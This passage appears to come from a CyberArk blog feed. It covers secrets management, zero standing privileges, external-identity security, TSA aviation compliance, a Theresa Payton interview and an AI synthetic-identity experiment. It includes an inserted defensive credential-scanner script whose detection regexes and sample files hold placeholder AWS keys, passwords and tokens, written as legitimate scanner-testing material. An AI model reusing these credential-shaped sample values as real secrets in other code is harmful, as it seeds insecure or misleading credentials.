Baking tip: To get the cloud security recipe right, adjust controls according to the risk level of data in a SaaS application. For example, compromised access to apps containing IP or EHR data poses more risk than access to a training application. Just like with the PAM controls securing access to high-risk infrastructure, requiring step-up authentication for the most sensitive web apps is a simple best practice that can significantly reduce risk.

Bonus Layer: Secrets Management (the Icing on the Cake)

Humans aren’t the only identities requiring privileged access in multi-cloud environments. Machine identities like serverless functions, application accounts and RPA bots also use credentials to authenticate autonomous processes. In fact, it’s estimated that machine identities outnumber human identities in today’s software-heavy world by a factor of 45:1.

Organizations must govern application secrets consistently to reduce the risk of attackers compromising hardcoded credentials. Centralizing governance and credential rotation in a single cloud-agnostic hub can help mitigate this risk.
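As an added example (not CyberArk code), here is the kind of check that belongs in a pre-commit hook or CI step while application secrets are being moved out of code and into a central store: a small rule set that flags common shapes of hardcoded credentials in constructed sample files, skips lines that merely reference a secret from the environment or a template, and redacts matches so the finding itself never echoes the secret into CI logs. The sample files are constructed, and the key values are AWS’s published example credentials, not real ones:

```python
"""Hardcoded credential scanner for source and configuration files.

Added example, not CyberArk code.  The rules, sample files and path names are
constructed; the AWS key values are the provider's documented example credentials.
"""
import re

# (rule name, pattern).  Patterns are deliberately conservative to keep noise low.
RULES = [
    ("AWS access key ID", re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("AWS secret access key assignment",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})")),
    ("Private key block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----")),
    # Closing quote must match the opening one, so template fragments don't match.
    ("Password literal", re.compile(r"(?i)(password|passwd|pwd)\s*[=:]\s*(['\"])([^'\"]{6,})\2")),
    ("Generic API token",
     re.compile(r"(?i)\b(api[_-]?key|token)\s*[=:]\s*['\"][A-Za-z0-9_\-]{20,}['\"]")),
]

# Lines that reference a secret rather than contain one (env var, vault/template lookup).
_IS_REFERENCE = re.compile(r"\{\{|\$\{|os\.environ|getenv|lookup\(")

# Constructed sample repository contents.
SAMPLE_FILES = {
    "app/settings.py": '''import os
DB_PASSWORD = "hunter2hunter2"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
API_TIMEOUT = 30
''',
    "deploy/vars.yml": '''db_host: db.internal.example
db_password: "{{ lookup('env', 'DB_PASSWORD') }}"
api_key: "ghp_exampleexampleexampleexample1234"
''',
    "app/clean.py": '''import os
DB_PASSWORD = os.environ["DB_PASSWORD"]   # injected from a vault at deploy time
''',
}


def scan_text(path, text):
    """Return findings for one file; each finding carries a redacted preview only."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if _IS_REFERENCE.search(line):
            continue                       # a reference to a secret is the desired state
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                redacted = line[:m.start()] + "***REDACTED***" + line[m.end():]
                findings.append({"file": path, "line": lineno, "rule": name,
                                 "preview": redacted.strip()})
    return findings


def scan_files(files):
    """Scan a {path: contents} mapping in order and concatenate the findings."""
    return [f for path, text in files.items() for f in scan_text(path, text)]


if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for f in results:
        print(f"{f['file']}:{f['line']}: {f['rule']} | {f['preview']}")
    raise SystemExit(1 if results else 0)   # non-zero exit fails the CI step
```

The `app/clean.py` file shows the target state: the same variable name, but the value comes from the environment (populated from a secret store), so the scanner reports nothing for it.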

Baking tip: For the tastiest frosting, cater to the tastes of your development teams. Many engineers prefer to use native tooling from AWS, Azure and GCP. Allowing for the rapid ‘retrofit’ of credential management to cloud-native secret stores can keep developers happy – and secrets secure.

Intelligent privilege controls are vital ingredients within every layer of a multi-cloud environment. With a layered approach to securing privileged access, organizations can develop a powerful recipe: user-friendly security that doesn’t slow down engineering velocity. That’s quite the achievement – maybe not as impressive as a warm, rich chocolate cake, but an impressive output nonetheless.

To learn more about all layers of the multi-cloud identity security cake, feast your eyes on the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.”

Sam Flaster is a director of product marketing at CyberArk.

Making Zero Standing Privileges a Reality https://www.cyberark.com/blog/making-zero-standing-privileges-a-reality/ Fri, 28 Jul 2023 17:46:37 +0000 https://www.cyberark.com/?p=181042

The most significant change in the lifespan of identity security thus far is zero standing privileges (ZSP). Considered the next evolution of just-in-time (JIT) access, it may seem needlessly complex at first, but once you wrap your head around the concept, it feels as natural as turning off the lights when you leave a room.

But first, a bit about me and the journey to ZSP.

I’m lucky enough to have thus far had a diverse career in tech that’s had me in a series of roles, from being an engineer to working with advisory consultants. During my time building infrastructure at scale, there’s been a constant demand for concepts that address the risk posed by privileged access without impacting ops productivity. As it turns out, years later, as I led CyberArk’s Strategic Alliances Solutions Architecture practice, I saw this exact challenge from another viewpoint. People want to behave in a way that keeps their organizations safe, but they expect to remain productive – not blocked by intrusive controls.

The ZSP concept meets that need.

The Journey to Zero Standing Privileges

Least privilege (or the principle of least privilege (PoLP)) is always a no-brainer. If you don’t need access, you should not have access.

I ran a team of operations engineers many years ago supporting a large-scale Infrastructure-as-a-Service (IaaS) platform. In looking at what we could do to improve the security of our platform, least privilege made perfect sense to us – it felt like a boundary that defined if something was in scope for our team or not.

(Image: a glimpse, from the author’s perspective, of 400 servers – or about 2% of the platform managed by his team in 2013.)

We ran with the principle of least privilege – piloting various implementations and methodologies. But ultimately, that least privilege journey fell flat. The team, comprised of what would now be called platform or site reliability engineers, had massive hesitance to give up the access rights they felt they might need during an incident. Any team dealing with a critical situation is very familiar with the idea that it’s hard to build a technical plan for ‘when it goes wrong.’ Things never break in the way you expect.

In looking for the next concept that might allow us to improve the security of our platform, just-in-time (JIT) access was an easy winner for us. The only thing holding us back was our collective ‘when it goes wrong’ mindset where, during a critical situation, we’d often want to troubleshoot at a large scale across the entire platform, potentially accessing hundreds of servers, routers and switches to identify the issue. This wasn’t an unreasonable concern, but one that could be exploited by any attacker present.

As it turns out, I left the organisation before anyone definitively figured out the correct solution. I considered it a real miss that I never actually determined the right way to improve the identity security of our platform.

The reality was that we needed something that combined these concepts with consideration for the operational impact. This is where the concept of ZSP becomes highly relevant.

What is Zero Standing Privileges?

In short, ZSP evolved from JIT access because it was a necessity. Simply turning on and off administrative access for a user didn’t offer enough risk reduction for many modern enterprises.

ZSP is the concept that an identity sits with no entitlements on the resource it will be used to access – until the identity is needed and entitlements are requested. When granted, those permissions are only the ones required. It’s giving access to the right people at the right time – no more and no less. This represents a massive attack surface reduction as the account itself is now useless – even if an attacker could log in, they can’t do anything because they have zero permissions!

As such, ZSP is an excellent concept, sitting at the intersection of JIT access and least privilege. It addresses those frustrating ‘what-ifs’ that held me back due to the requirement of rapid access grants.

(Image: the author attempts to bypass a cloud provider’s controls to demonstrate the power of ZSP.)

Zero standing privileges adds further protection to just-in-time access as a concept. With JIT access alone, you can’t grant just the right set of privileges to an account, and that scoping is arguably the core requirement of ZSP.

Only allowing an account to have the privileges it needs by exception rather than standing entitlements and returning it to no privileges puts you in a situation where you can minimise that account’s exposure. Elevating access just-in-time does reduce the risk of credential theft. But, once access is provided, internal or external bad actors have more entitlements to exploit, enabling lateral movement and privilege escalation. A ZSP approach also reduces the volume of systems or services an attacker could compromise when they gain access. This is easily one of the most effective strategies for reducing risk.

How to Make ZSP a Reality

First, you’ll need to find a way to handle elevation, a mechanism to align a user to a group of permissions. For a realistic chance of adoption, elevation mechanisms must be integrated into service management or ChatOps to speed up the handling of approvals.

You’ll also need to move away from thinking in the binary ‘is this an admin or not’ mindset and consider how the user access level poses a risk and find tooling to manage that. The distinction between privileged and non-privileged access is nebulous in modern Infrastructure as a Service (IaaS) environments. Lastly, you’ll need to ensure that whatever permissions you grant get removed as soon as the session ends.
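The three requirements just listed (an elevation mechanism that maps a user to a scoped set of permissions, a non-binary view of access, and removal of permissions as soon as the session ends), together with the ‘useless at rest’ account described under ‘What is Zero Standing Privileges?’, as an added example that is not CyberArk code. It models a ZSP elevation broker: an identity holds no entitlements at rest, requests a job-scoped role against a ticket, a separate approver grants it for a bounded time, and the grant is revoked on session end or expiry. Roles, identities, tickets and approvers are constructed, and the clock is injectable so expiry can be exercised offline:

```python
"""Zero standing privileges (ZSP) elevation broker model.

Added example, not CyberArk code.  Roles, identities, tickets and approvers are
constructed; use time.monotonic (the default) in real code and FakeClock only in demos.
"""
import time
from dataclasses import dataclass

# Constructed catalogue: each role is scoped to one job, none is a blanket 'admin'.
ROLES = {
    "payments-db-reader": frozenset({"rds:DescribeDBInstances", "rds-data:ExecuteStatement"}),
    "payments-incident-responder": frozenset({"ec2:DescribeInstances", "ssm:StartSession",
                                              "logs:FilterLogEvents"}),
}


@dataclass
class Grant:
    identity: str
    role: str
    ticket: str
    approved_by: str
    expires_at: float


class FakeClock:
    """Deterministic clock so time-to-live expiry can be demonstrated without waiting."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class ZspBroker:
    def __init__(self, clock=time.monotonic, max_ttl=3600):
        self._clock = clock
        self._max_ttl = max_ttl
        self._grants = {}      # identity -> active Grant (one elevation at a time)
        self.audit = []        # append-only trail of grant/revoke events

    def request(self, identity, role, ticket, approver, ttl):
        """Elevate identity into role for ttl seconds; the approver must be someone else."""
        if role not in ROLES:
            raise KeyError(f"unknown role {role!r}")
        if not 0 < ttl <= self._max_ttl:
            raise ValueError("ttl must be between 1 and max_ttl seconds")
        if approver == identity:
            raise PermissionError("self-approval is not allowed")
        grant = Grant(identity, role, ticket, approver, self._clock() + ttl)
        self._grants[identity] = grant
        self.audit.append(("grant", identity, role, ticket, approver))
        return grant

    def entitlements(self, identity):
        """Effective permissions right now; an expired grant is revoked on the way out."""
        grant = self._grants.get(identity)
        if grant is None:
            return frozenset()             # at rest: zero privileges
        if self._clock() >= grant.expires_at:
            self._revoke(identity, "expired")
            return frozenset()
        return ROLES[grant.role]

    def is_permitted(self, identity, action):
        return action in self.entitlements(identity)

    def end_session(self, identity):
        """Return the identity to zero privileges as soon as its session ends."""
        if identity in self._grants:
            self._revoke(identity, "session-ended")

    def _revoke(self, identity, reason):
        grant = self._grants.pop(identity)
        self.audit.append(("revoke", identity, grant.role, grant.ticket, reason))


if __name__ == "__main__":
    clock = FakeClock()
    broker = ZspBroker(clock=clock)
    print("at rest:", broker.is_permitted("alice", "ssm:StartSession"))          # False
    broker.request("alice", "payments-incident-responder", "INC-1234", "oncall-lead", ttl=600)
    print("during incident:", broker.is_permitted("alice", "ssm:StartSession"))  # True
    print("outside scope:", broker.is_permitted("alice", "iam:CreateUser"))      # False
    clock.advance(601)
    print("after ttl:", broker.is_permitted("alice", "ssm:StartSession"))        # False
    for event in broker.audit:
        print(event)
```

The audit list is what a service management or ChatOps integration would consume: every grant records the ticket and approver, and every revocation records why the identity went back to zero, whether by expiry or because the session ended.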

If you’re looking for a modern, dynamic way to secure access in your cloud platform (as I once was), check out the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.”

Josh Kirkwood is a senior product marketing manager at CyberArk.

Five Ways to Secure External Identities https://www.cyberark.com/blog/five-ways-to-secure-external-identities/ Fri, 21 Jul 2023 15:13:30 +0000 https://www.cyberark.com/?p=180487

If you stick with any movie through the end credits, you’ll see – not just the household names who act and direct – but the full scope of players who make a film happen. The scroll can seem endless: writers, CGI designers, location scouts… animal handlers and the illustrious “best boy grip.” It’s a wide-ranging ecosystem where everyone plays a role. And it’s very similar to the high-stakes cloud and digital initiatives that today’s enterprises are driving forward – and today’s attackers are targeting.

A successful transformation requires a diverse cast. Securing them calls for a closer look at who has risky levels of access to sensitive resources. It’s not only the IT employees working in critical environments. And it goes beyond the sharp increase in everyday employees accessing sensitive data in applications.

Roll the credits for any top enterprise initiative, and you’ll see an ecosystem of contributors from outside the workforce who also need access to internal resources to do their jobs. The scroll would look something like this:

  • Vendors
  • Suppliers
  • Contractors
  • Partners
  • Clients
  • Agencies
  • Franchises
  • Affiliates
  • Dealerships

Every day, external business-to-business (B2B) contributors use enterprise-provided applications, portals and services from various devices and locations. And attackers know it.

External B2B Users: Key to Success and Key Attack Targets

Consider how many outside contractors work for your organization and imagine just one falling victim to a phishing attack. A malicious actor tricks them into sharing their password for an enterprise app, digs around until locating high-value resources and makes a devastating next move. It’s a movie we’ve seen, but the script is flipped – to entail third-party vulnerabilities that are hard to control.

One example: an insurance company’s extended workforce of third-party agents who use the company’s online portals on the road – one compromised identity could result in the data of millions of policyholders being leaked. For a private hospital system’s network of electronic healthcare data vendors, this type of attack could result in a central database of patient records being held for ransom.


And that’s just considering external B2B users who are actively working with organizations.

Third-party risk often stems from B2B users who no longer work with an organization but still have lingering access to its applications, data and environments. IT security teams are already bogged down with manual processes for managing full-time employees’ access. The complexity grows when considering external users. One missed step in a manual, error-prone offboarding process can allow threat actors to exploit inappropriately provisioned, overprivileged or orphaned accounts.

How to Provide Protection and Positive UX for External Collaborators

Across any industry or use case, there’s a common link: external B2B users need protection as fierce as your employees’. In addition, their user experience in accessing your applications and resources must be designed to help them succeed. Here’s a brief look at five areas of best practices to help you achieve that balance.

1. Ensure Secure, User-Friendly Access to Applications

A frictionless experience is essential for external B2B users when they authenticate into applications to engage with your organization. This helps vendors and contractors do their jobs; it also helps ensure that clients and partners view your brand favorably. But how can you achieve these outcomes without sacrificing security? Here are a few building blocks to keep in mind:

  • Allow external users to access applications with a single set of corporate credentials via intelligent single sign-on (SSO), reducing password usage.
  • Verify users with adaptive multifactor authentication (MFA) that draws context from user behavior analytics to determine whether a log-in attempt is low- or high-risk – and, in turn, requires lighter or stronger authentication factors accordingly.

2. Bring Structure to Identity Data Storage and Management

As your organization’s digital and cloud initiatives grow in scope and scale, the number of external B2B identities requiring protection is surging, and those identities are scattered across disparate systems. So, how can you ensure their information is accounted for and protected while not making things difficult for partners? Here are some best practices:

  • Store identity information for external B2B users in a secure, centralized repository.
  • Allow external B2B organizations’ admins to use their trusted identity providers to authenticate end users via a cloud-hosted directory service that supports identity federation.
  • Simplify administration tasks and oversight while helping eliminate adoption barriers among external partners’ IT and security teams.

3. Balance Flexibility with Security in Identity Administration

It’s challenging enough to stay ahead of identity administration for employees. The job can feel unwieldy when factoring in external users. You can reduce the burden and risks of third-party identity administration by giving partners a mix of autonomy and security-first features, including:

  • Provide external B2B partners’ IT teams with a hierarchical, multi-tenant delegation model that allows admins to manage identity data across a shared environment.
  • Introduce an overall tiered approach through which a designated partner admin can manage their end users, overseeing their access rights as roles change over time.
  • Delegate administration responsibilities to peer admins and trusted non-admin users (as needed).

4. Automate Processes and Tasks for Managing Identities

Automation can help IT security teams escape from the pattern of manually connecting dots and scripting integrations between variables like data and applications. The same applies to manual procedures and workflows for granting, adjusting or revoking access.

Here are some examples of how automation can help IT security teams regain bandwidth and reduce risk:

  • Provision access automatically and manage entitlements throughout your external B2B users’ lifecycles, from onboarding to offboarding.
  • Bolster defenses around siloed applications with custom security features and standardize your approach across apps through a simplified security model.
  • Eliminate manual tasks with flexible workflows and automated orchestration of data, processes, tasks and events.

5. Secure Access for Third-party Privileged Users

While the nature of third-party risk has expanded beyond the traditional definition of privilege, it remains critical that organizations secure the identities of external users with the highest levels of sensitive access.

Take, for example, an IT user working for one of your vendors. If this user’s identity is compromised, the attacker’s next steps – e.g., lateral movement and privilege escalation – aren’t limited to the vendor’s environment. They’re a stepping stone to yours. Here are a few capabilities and controls that can help you secure third-party privileged access:

  • Ensure privileged users from external vendors confirm their identities each time they need to access critical assets via biometric MFA.
  • Implement just-in-time (JIT) provisioning for vendors when they need to access business applications and sensitive information.
  • Gain full visibility into vendor activities via privileged session monitoring, with complete reporting, auditing and remediation capabilities.

Next Steps: Achieving High-Quality UX and Security-First Access Balance

The cast of characters playing essential roles in driving your high-stakes initiatives continues to grow in number, scope and risk. Keeping their identities secure is essential for preventing third-party breaches and attacks – and for protecting everything these external B2B users are building for your enterprise.

Similar to the movies, this blog post has a director’s cut with additional content. For a deeper look at the controls and capabilities needed to protect external B2B identities, read our recent whitepaper, “Secure Your External Users’ Access to Enterprise Applications.”

John Natale is a senior content marketing manager at CyberArk.

Preparing for TSA Cybersecurity Compliance with Identity Security https://www.cyberark.com/blog/preparing-for-tsa-cybersecurity-compliance-with-identity-security/ Tue, 18 Jul 2023 15:45:03 +0000 https://www.cyberark.com/?p=180292

The aviation industry relies on a complex web of players and digital systems to fly passengers safely around the world. Billions of data points flow across this vast interconnected ecosystem – from cloud-based ticketing apps and customer experience portals, to third-party vendors and technology systems, to airport ground operations and in-flight aircraft.

While connectivity is mission-critical to airline and airport operations, it also means that any cyberattack or digital disruption could quickly ripple outward, negatively impacting numerous entities, degrading customer experiences and potentially even compromising human safety.

Just last month, two major airlines disclosed data breaches caused by a cyberattack on a third-party recruiting vendor. According to reports, personal information of nearly 9,000 airline pilots was exposed. Unfortunately, this wasn’t an isolated incident. Cyberattacks on airlines, airports and their many third-party providers are rising globally. As with other critical infrastructure sectors, transportation’s risk exposure is heightened by technical complexity, underlying infrastructure issues and vulnerable operational technology (OT).

A string of distributed denial-of-service (DDoS) attacks last fall temporarily took down several major U.S. airport websites. In February 2023, seven German airports experienced a similar attack that left thousands of travelers stranded. Airports across the European Union (and everywhere else) are being hit hard by ransomware, according to a 2023 report by the European Union Agency for Cybersecurity. The same report identifies airlines’ customer data and original equipment manufacturers’ proprietary information as cyberattackers’ top targeted assets.

Building Cybersecurity Resiliency for Airport and Aircraft Providers

Such targeted attacks on critical infrastructure are prompting government action. In the United States, the Transportation Security Administration (TSA) has called on airports and aircraft providers to step up their cybersecurity practices.

According to enhanced TSA requirements released this March, all TSA-regulated airports and aircraft providers must “develop an approved implementation plan that describes measures they are taking to improve their cybersecurity resilience and prevent disruption and degradation to their infrastructure.” TSA released similar requirements in 2022 for passenger and freight railroad carriers. Both steps are part of a broader push to strengthen the cybersecurity resilience of the nation’s critical infrastructure and align with the Biden administration’s Zero Trust-focused National Cybersecurity Strategy.

Preparing to Meet TSA’s Enhanced Cybersecurity Requirements

Airport and aircraft operators must take four actions to meet TSA’s latest cybersecurity requirements. While specific details on mandatory security controls, assessment parameters and compliance deadlines have not yet been disclosed, many TSA-regulated entities are referencing Security Directive 1580/82-22-01 for the railroad industry as they prepare for their own directive. In the meantime, they have this high-level guidance from TSA:

Action 1: Network Segmentation

“Develop network segmentation policies and controls to ensure that operational technology systems can continue to safely operate in the event that an information technology system has been compromised, and vice versa.”

Network segmentation is an important step for limiting access to devices, data and applications. In the aviation industry, operational technology (OT) networks power everything from airport baggage-handling systems to critical air traffic control processes. Creating boundaries between OT and IT networks helps minimize identity-based threats, such as phishing, ransomware and other credential theft attacks. Network segmentation also separates and protects OT network layers while allowing authorized communications and other critical processes to continue.

Action 2: Access Control

“Create access control measures to secure and prevent unauthorized access to critical cyber systems.”

The aviation sector is in a continuous state of digital transformation, and identities – human and machine – are surging in numbers. Across industries, virtually all (99%) security decision-makers believe they’ll face an identity-related compromise in the year ahead, reinforcing the need for a Zero Trust approach to security.

Modern identity security controls, centered on privilege, enable Zero Trust by verifying every user, validating every device and intelligently limiting access to any resource anywhere, everywhere. This includes continuous authentication to validate a user’s entire session – not simply a single multi-factor authentication (MFA) request – and monitoring user behavior to identify when an identity has been compromised. This brings us to TSA’s required action number three.

Action 3: Continuous Monitoring and Detection

“Implement continuous monitoring and detection policies and procedures to defend against, detect, and respond to cybersecurity threats and anomalies that affect critical cyber system operations.”

With so many distributed workforce users, privileged users, third-party vendors and data streams in play, aviation organizations need a centralized, continuous process to detect risky security events and behaviors. Otherwise, context and coverage gaps could cause them to miss, mishandle or respond too slowly. Identity security solutions that continuously monitor behavioral signals help ensure users are who they say they are, while empowering incident response and security operations teams to address threats quickly and confidently.

Action 4: Patch and Manage Critical OT Connections

“Reduce the risk of exploitation of unpatched systems through the application of security patches and updates for operating systems, applications, drivers and firmware on critical cyber systems in a timely manner using a risk-based methodology.”

Keeping critical airport and airline systems patched and up to date is an essential defense-in-depth endpoint security component. But human error has no patch. Combining patch management and other traditional endpoint security tools with foundational endpoint privilege security will help strengthen overall security posture and reduce exposure to ransomware and other dynamic threats.

How Aviation Organizations Can Strengthen Cyber Resilience

Navigating evolving cybersecurity requirements can be complex, but airports and airlines don’t have to go it alone. CyberArk can provide the guidance and support needed for these critical infrastructure organizations to comply with TSA’s enhanced requirements to protect information and systems.

The CyberArk Identity Security Platform is uniquely positioned to help them strengthen cyber resilience by surrounding every identity – human and machine – with a powerful force field of continuous protection. With a security-first approach grounded in Zero Trust and least privilege, CyberArk enables them to manage who has access to what, and for how long, while empowering them with the confidence of unmatched detection, prevention and control over their entire infrastructure.

Jay Willoughby is AVP Commercial Sales – U.S. at CyberArk.

]]>
Theresa Payton on Identity Threats and the Chief ‘Influence’ Security Officer https://www.cyberark.com/blog/theresa-payton-on-identity-threats-and-the-chief-influence-security-officer/ Thu, 13 Jul 2023 17:45:36 +0000 https://www.cyberark.com/?p=180068 Theresa Payton on Identity Threats

You’re reading the CyberArk blog (and we thank you for that), so you’re likely familiar with the name Theresa Payton. The cybersecurity visionary, first female White House CIO, best-selling author and founder and CEO of Fortalice Solutions is a powerful industry voice, blending her frontline cybercrime fighting experience with cutting-edge insights to help organizations safely navigate the evolving threat landscape.

Not long ago, I had the honor of speaking with Payton on the CyberArk Trust Issues podcast. We covered so much ground – from revisiting major historic threats to exploring ransomware’s impact and future AI applications – that we dropped two episodes. Give part one and part two a listen and check out these top takes from our conversation.

Yesterday’s Threats are Still Alive and Well

Payton served as CIO in the George W. Bush White House from 2006 to 2008 – a time of significant technological change in the workplace and at home. Among other major happenings, Apple released its first-ever iPhone and social media was starting to take off. Here’s what Payton had to say about the threat landscape during this time and its lasting influence.

Theresa Payton: “We didn’t know how good we had it, even though cybercriminals were doing some pretty bad things. Major cybersecurity threats looked like phishing scams, spam emails, botnets. Malware was very quaint and SQL injection attacks were extremely popular. Nation states and syndicates were operating at a different level, mainly focused on the defense industrial base and government organizations. They weren’t going after the small, medium and large enterprises as they certainly do today. Even things like ransomware, which was in its infancy, mostly focused on computers in a network. It wasn’t at the large scale seen today. But what’s interesting to me is that phishing scams and spam email are still alive and well. We can’t seem to get rid of them. Botnets are still used and malware is still built to steal information and conduct other nefarious types of activities. And the fact the SQL injection attacks still work – that’s incredible to me.”

Technology Multiplies Misinformation Campaigns

Fast-forward to present day. The threat landscape continues to grow in size and complexity, and digital advancements bring new twists to age-old misinformation and fraud schemes.

TP: “It’s part of human nature to manipulate and misinform others to get them to see your point of view. Social media gave those with nefarious intents a free stage. All they had to do was understand how search engine optimization and hashtags work to launch their own amplification marketing campaigns. In some regards, I think retailers and other companies would marvel at what misinformation experts can accomplish with very little money. This has led to a rapid spread of misinformation on all types of topics – everything from pump-and-dump schemes for cryptocurrency, health, politics, science and deepfake technology. All of these can be used to create fake news, propaganda and disinformation. Artificial intelligence raises the stakes. We’ve already seen how AI helps botnet masters much more effectively manage their botnets. Having ChatGPT and other deepfake AI tools really just puts more power in the hands of the manipulators and mis/disinformation peddlers. It’s making it really challenging.”

Payton notes that we each play a part in fighting misinformation – by watching out for one another, learning how to spot disinformation campaigns and reporting inauthentic behavior and dangerous disinformation to social media platforms.

Photo of Theresa Payton, Founder and CEO of Fortalice Solutions, along with an accompanying pull quote from the article.

Hiring for Open Positions? Beware of ‘Franken-Fraud’ Identity Applicants

The recently published CyberArk 2023 Identity Security Threat Landscape Report finds that 93% of security professionals expect negative cyber impacts from AI tools in 2023 – and with good reason. Payton believes that thanks to AI, it won’t be long before ‘franken-fraud identities’ (also referred to as synthetic identities) enter the workforce.

TP: “Fraudsters and scammers will leverage cutting-edge deepfake AI technology to create personas – by creating images of these new identities, adding voices to them, creating videos, etcetera. In fact, all of this can be done mostly for free today. These ‘persons’ will use AI and big data analytics to test themselves and ensure they look authentic. The next thing you know, you’ve got ‘people’ who can interview for jobs. And since many jobs today are remote, companies may unknowingly hire a deepfake persona because it’s been matched up with a franken-fraud identity. Seriously – it can happen.”

“So how do you protect against this? For starters, you must understand how to safeguard your executive and employee data. Second, if you do remote hiring, work with an outsourcing firm to bring candidates into a physical office in whatever geography they’re in. Have them present different forms of identification. It’s not going to cost you that much and it’s a way to make sure you’re actually hiring the person you think you’re hiring.”

One Ransomware Trend Theresa Payton Never Saw Coming

Many organizations have benefitted from Payton’s near-prescient ability to predict cybersecurity trends and challenges ahead. She imagines how things will look two to three years out every year, and she’s usually spot on. Yet one recent development caught her completely off guard.

TP: “I love to study human behavior and technology implementations, so I typically have a pretty good handle on where things are headed. But I would’ve never predicted that insurance companies would encourage ransomware victims to pay ransoms. I remember the first time somebody told me that their insurance company said to pay the ransom because it would be cheaper than recovery. I said, ‘Well, that sends a really bad message. It’s like giving the schoolyard bully your lunch money. They’re just gonna come back tomorrow.’ When I looked in a crystal ball, I definitely saw a lot of the trends and patterns coming. But I never saw that one.”

On Double Extortion and Evolving Attacks

Unfortunately, the paying ransom trend only seems to be growing. CyberArk’s latest research found nearly three-quarters of organizations paid ransoms at least once in the last 12 months. Payton acknowledges that attackers are turning up the heat with double extortion but urges organizations to remember who they’re dealing with.

TP: “You are negotiating with a criminal. And even if the person you negotiated with might keep their word as an individual, which is debatable, it’s so distributed and outsourced these days that somebody else in the organization may not honor their word.”

“When we improve the kill chain in our resiliency and our recoverability, cybercriminals don’t say, ‘Wow, this is really hard. I should give this up and become a park ranger or bake pies for my neighbor.’ They just up their A game too. They don’t go away. That’s the great thing about cybercriminals, whether it’s a nation state, lone wolf or a cybercriminal syndicate – their behavior.”

So as organizations improve their ransomware defenses and recovery efforts, where will attackers turn next? Payton offers a rather grim prediction.

TP: “The better we get at shutting down ransomware syndicates on systems and data, malicious cyber actors will move to another place in the kill chain. Ransomware will pivot to the Internet of Things, devices, access control cards, thermostats, TVs, physical buildings controlled by computers – you name it – and hold them for ransom.”

Payton writes in her 2024 cybersecurity predictions that attackers could go as far as “hacking into intelligent buildings, locking them down with people inside and demanding a hostage payment to release individuals.”

Putting the “Influence” in CISO

Chief Information Security Officers (CISOs) have a difficult job that’s constantly changing as technology, workforces and cyber threats evolve. Many CISOs are understaffed and under-resourced. They’re grappling with highly complex IT environments and exponential – but often insecure – identity growth. Payton encourages these cybersecurity leaders to expand and solidify their influence across their organizations to amplify their impact.

TP: “As a CISO, you will never have the full span of control that you probably should have to protect all the digital assets under your organization’s care. You’re never going to have enough tools and budget and people. And you really do need to understand that. Once you do, ask yourself how you can influence your organization to be secure by design.”

“Are you going to sit with the developers the whole time? Are you going to sit with the third-party marketing firm doing internet campaigns with social media platforms? No. So how do you make sure you have influence everywhere within the organization? You can’t do it by being a bottleneck and saying no to everything. You do it by understanding the mission and values of your organization and figuring out the human user stories of your employees, customers and third-party vendors. Then, you focus on where things need to be secure and how to influence the people responsible for those human user stories. That is where CISOs need to go with their thinking. If you don’t wake up every morning thinking about that, in addition to what you’re doing today, you’re going to miss a unique opportunity to have a long-lasting legacy and impact.”

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

Editor’s note: Remarks have been edited for length and clarity. To listen to the entire Trust Issues interview with Theresa Payton, check out the players below – or find the episodes wherever you get your podcasts.

]]>
Synthetic Identity: When AI and ML Crunch (Your) Harvested Data https://www.cyberark.com/blog/synthetic-identity-when-ai-and-ml-crunch-your-harvested-data/ Thu, 06 Jul 2023 17:56:51 +0000 https://www.cyberark.com/?p=179984 synthetic identity AI ML

ChatGPT knows a lot about Len Noe, CyberArk’s resident technical evangelist, white hat hacker and biohacker. The biohacker piece of his title is a nod to the fact that Noe is transhuman (you might call him a cyborg and be right), which is why his grandkids call him “Robo Papa.”

ChatGPT knows all of this.

That’s because Noe fed everything he could find about himself that’s publicly available on the internet and by way of open-source intelligence (OSINT) into ChatGPT, all for the sake of cybersecurity research. These inputs included places he’s lived, auto registrations, utility bills, social media posts and transcripts of presentations he’s given and interviews he’s done. If it’s out there in the digital world, Noe plugged it into ChatGPT. What he wound up creating is a digital version of himself – what he refers to as his synthetic identity.

And, as Noe explains it, this synthetic identity – the identity that’s born from the blurring of physical and digital characteristics used to identify individual human beings – is permanent. The more you share online, wherever and however it may be, the more breadcrumbs you leave for attackers to someday, somehow use for nefarious purposes.

This is why Noe has created his own synthetic identity – as an extension of his ongoing effort to think like attackers – and, in doing so, stay a step or more ahead of them. “I was actually able to interact with a digital version of myself that had understanding, as well as information about my physical existence,” he told me in a recent episode of CyberArk’s Trust Issues podcast.

Screen captured video of Len Noe combing for his own publicly available information via OSINT.

Feeding Harvested Data into ChatGPT for Synthetic Identity Creation

At first blush, Noe’s ChatGPT experiment seems like doxing – the malicious act of curating and publishing identifiable information about a person or organization on the internet without their consent. But there are two big differences. First, the synthetic identity Noe created is based on his own personal data, and second, ChatGPT’s AI engine has the superhuman processing power to fuse disparate data points together instantaneously.

“All those little bits and pieces of [personally identifiable] information are spread out across multiple, different databases, so it’s very hard to make correlating points between them,” Noe says. “But if you take all of that information and put it into ChatGPT – something whose main intended purpose is to find those types of correlations…” Noe trails off, but the implications are clear. Machine learning (ML), powered by artificial intelligence (AI), can make all sorts of connections about a person, and in doing so, expose them to significant risk.

In feeding all of that unprotected, harvested data into the ChatGPT blender, the output could take doxing to the next level. And the readily accessible opportunities for attackers lie in a swelling digital ocean of identities. The data correlations made possible through AI can make it much easier for attackers to deduce potential targets’ passwords and recovery questions. In a blink, AI can extract or deduce your mother’s maiden name or the street you grew up on – or most any typical standard question/answer for self-service recovery portals. And once it has that information, let the games begin.

Screen captured video of Noe interacting with his synthetic identity after inputting lots of his own publicly available data into ChatGPT.

